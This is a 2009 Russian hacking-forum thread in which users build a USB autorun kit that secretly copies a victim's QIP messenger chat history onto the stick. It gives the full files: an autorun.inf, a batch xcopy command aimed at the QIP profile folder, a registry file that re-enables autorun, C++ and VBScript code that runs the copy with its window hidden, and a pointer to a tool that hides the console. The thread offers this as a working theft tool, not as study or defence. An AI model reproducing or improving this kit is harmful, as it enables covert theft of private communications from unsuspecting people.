HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Безопасность и Анонимность > Windows
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как спрятать процесс копирования.
  #1  
Старый 30.06.2009, 16:17
space_ninja
Новичок
Регистрация: 25.06.2009
Сообщений: 25
С нами: 8884456

Репутация: 12
Question Как спрятать процесс копирования.

Поставил себе задачу, сделать флешку предназначенную для стыривания инфы, для конкретики решил копировать хистори квипа. Получилось следующее:

autorun.inf
Цитата:
[Autorun]
Shell="CMD"
ShellExecute="1.bat"
Icon = "autorun.ico"
1.bat
Цитата:
chcp 1251
xcopy "C:\Documents and Settings\%USERNAME%\Application Data\QIP\Profiles\*" ..\desktop /C /H /Q /S /Y /Z
chcp 866
И забацал файлик чтобы двумя кликами менять свойства ауторана в Винде.
autorun.reg
Цитата:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\policies\Explorer]
"NoDriveTypeAutoRun"=dword:0000005b

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\policies\Explorer]
"NoDriveTypeAutoRun"=dword:0000005b
Но вот проблема возникла, хочется окно процессом копирования скрыть.
Реально ли такое штатными средствами Винды или все-таки кодить надо?
 
Ответить с цитированием

  #2  
Старый 30.06.2009, 17:15
\\ChaOs//
Познающий
Регистрация: 26.02.2009
Сообщений: 65
С нами: 9054681

Репутация: 34
По умолчанию

Вот держи, набросал в с++

тынц

Синтаксис:
Код:
execute.exe "путь до файла\file"
Пример:
Код:
execute.exe d:/autorun/1.bat
Исходник:

Код:
#include "stdafx.h"
#include "shellapi.h"


int APIENTRY _tWinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPWSTR lpCmdLine,int nShowCmd)
{
if(*lpCmdLine)

	ShellExecute(NULL,L"open",lpCmdLine,NULL,NULL,SW_HIDE);
else
{
	MessageBox(NULL,L"Неверно заданы параметры.\nСинтаксис: execute.exe filename.",L"Ошибка",MB_ICONASTERISK);
	return 1;
}
 	return 0;
}
Программа запускает файл с флагом HIDE, тоесть запущенный файл нигде кроме как в процессах не увидешь.

Последний раз редактировалось \\ChaOs//; 30.06.2009 в 21:50..
 
Ответить с цитированием

  #3  
Старый 30.06.2009, 21:18
Huster
Познающий
Регистрация: 08.05.2009
Сообщений: 46
С нами: 8953552

Репутация: 55
По умолчанию

Цитата:
Но вот проблема возникла, хочется окно процессом копирования скрыть.
Вот есть такая программка которая bat в exe конвертирует и черное окошко скрывает. Скачать можно тут https://forum.antichat.ru/showthread.php?t=75136
 
Ответить с цитированием

  #4  
Старый 30.06.2009, 22:24
Lamia
Участник форума
Регистрация: 11.07.2007
Сообщений: 190
С нами: 9913237

Репутация: 185
По умолчанию

Не нужно бат!Чистое вин апи те поможет!
 
Ответить с цитированием

  #5  
Старый 02.07.2009, 02:32
Fepsis
Постоянный
Регистрация: 17.09.2008
Сообщений: 562
С нами: 9288386

Репутация: 536


По умолчанию

Цитата:
Сообщение от space_ninja  
Реально ли такое штатными средствами Винды или все-таки кодить надо?
Реально... Юзай VBScript...
Вообще можешь сделать всё своим же батником, но запустив его безпалевно через .vbs
Код:
Set WshShell = CreateObject("WScript.Shell") 
WshShell.Run "cmd.exe /c 1.bat", 0, false
 
Ответить с цитированием

  #6  
Старый 02.07.2009, 13:08
space_ninja
Новичок
Регистрация: 25.06.2009
Сообщений: 25
С нами: 8884456

Репутация: 12
По умолчанию

всем спасибо )
решил через vbs сделать.

в итоге имеем
autorun.inf
Цитата:
[Autorun] ShellExecute="1.vbs" Icon = "autorun.ico"

1.vbs

Цитата:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "cmd.exe /c 1.bat", 0, false
1.bat
Цитата:
chcp 1251
xcopy "C:\Documents and Settings\%USERNAME%\Application Data\QIP\Profiles\*" ..\desktop /C /H /Q /S /Y /Z
chcp 866
reg_enable.reg
Цитата:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\policies\Explorer]
"NoDriveTypeAutoRun"=dword:0000005b

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\policies\Explorer]
"NoDriveTypeAutoRun"=dword:0000005b
и наличие папки desktop в корне флехи с правами на изменение.

из всех действий требуется только запустить авторан, два раз кликнув по значку флехи в папке "мой компьютер", все средства штатные )

Снимается убиванием процесса cmd.exe в диспетчере задач.

Если ситуация специфичная, то достаточно запустить 1.vbs (ну или как вам его понравится назвать, это уже из раздела лирики))) или можно установить разрешение на запуск авторана запустив файл reg_enable.reg

качать тут

Вроде все ))
если будут у кого-то еще идеи по совершенствования буду рад.

пойду поприкалываюсь )
всем респект и благодарности

Последний раз редактировалось space_ninja; 02.07.2009 в 17:43..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Халявный интернет или как спрятаться надежнее чем VPN или SSH с цепочкой соксов. kodzero Статьи 20 06.08.2010 23:54
Как определить, что Ваш ребенок растет хакером? PHOEN_i_X Болталка 148 13.06.2010 18:02
Халявный Интернет (для маленьких) stopxaker Статьи 91 20.04.2010 19:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...